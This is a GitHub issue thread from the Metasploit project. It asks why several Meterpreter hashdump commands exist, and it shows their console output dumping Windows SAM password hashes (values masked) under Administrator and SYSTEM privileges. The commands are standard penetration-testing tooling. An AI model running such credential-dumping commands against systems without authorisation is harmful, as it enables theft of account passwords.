### ISSUE TITLE
hashdump != run hashdump != post/windows/gather/hashdump != post/windows/gather/smart_hashdump 

### ISSUE THREAD

**Issue by after100** [rapid7/metasploit-framework#5683] opened 2015-07-08 16:49 UTC
hashdump != run hashdump != post/windows/gather/hashdump != post/windows/gather/smart_hashdump 

they r not all the same. y hav so many?
some work. some don
[b]better not 2 hav 1 command that is good and that works????[/b]

i get that two are post modules. but why? have two? why not smart replace normal?
i think that hashdump == run hashdump but it not.
hashdump work when admin run hashdump doesnt better to only use one?
why isnt run hashdump a shortcut to post module? output are different!!!

```
admin


meterpreter > getuid
Server username: TARGET\Administrator
meterpreter > hashdump
Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
Guest:501:zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 11223344567890poiuytreeeeeeeeeee...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 11223344567890poiuytreeeeeeeeeee...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter > run post/windows/gather/smart_hashdump 

[*] Running module against TARGET
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20150708173755_default_192.168.0.2_windows.hashes_417461.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.



system

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
Guest:501:zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 11223344567890poiuytreeeeeeeeeee...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
Guest:501:zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::


meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 11223344567890poiuytreeeeeeeeeee...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
Guest:501:zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::


meterpreter > run post/windows/gather/smart_hashdump 

[*] Running module against TARGET
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20150708173956_default_192.168.0.2_windows.hashes_725042.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] 	Obtaining the boot key...
[*] 	Calculating the hboot key using SYSKEY 11223344567890poiuytreeeeeeeeeee...
[*] 	Obtaining the user list and keys...
[*] 	Decrypting user keys...
[*] 	Dumping password hints...
[*] 	No users with password hints on this system
[*] 	Dumping password hashes...
[+] 	Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
```

**Comment by OJ** [comment] 2015-07-09 03:04
This is not a bug/issue/problem. If you want to discuss how these things work, and why they exist, please use forms that are set up at https://community.rapid7.com/ where lots of people discuss how to use Metasploit.

Closing.

**Closed by OJ** 2015-07-09 03:04 UTC

**Comment by martian1231** [comment] 2023-06-11 13:46
@after100 have you got any answer to this?

**Comment by bcoles** [comment] 2023-06-11 14:06
> @after100 have you got any answer to this?

after100 has not been active on GitHub for more than 5 years and it is unlikely they remember the answer to a question asked more than 8 years ago.

Perhaps start with the documentation:

* https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/gather/smart_hashdump.md
* https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/gather/hashdump.md

You could also try asking on Slack.

* https://www.metasploit.com/help
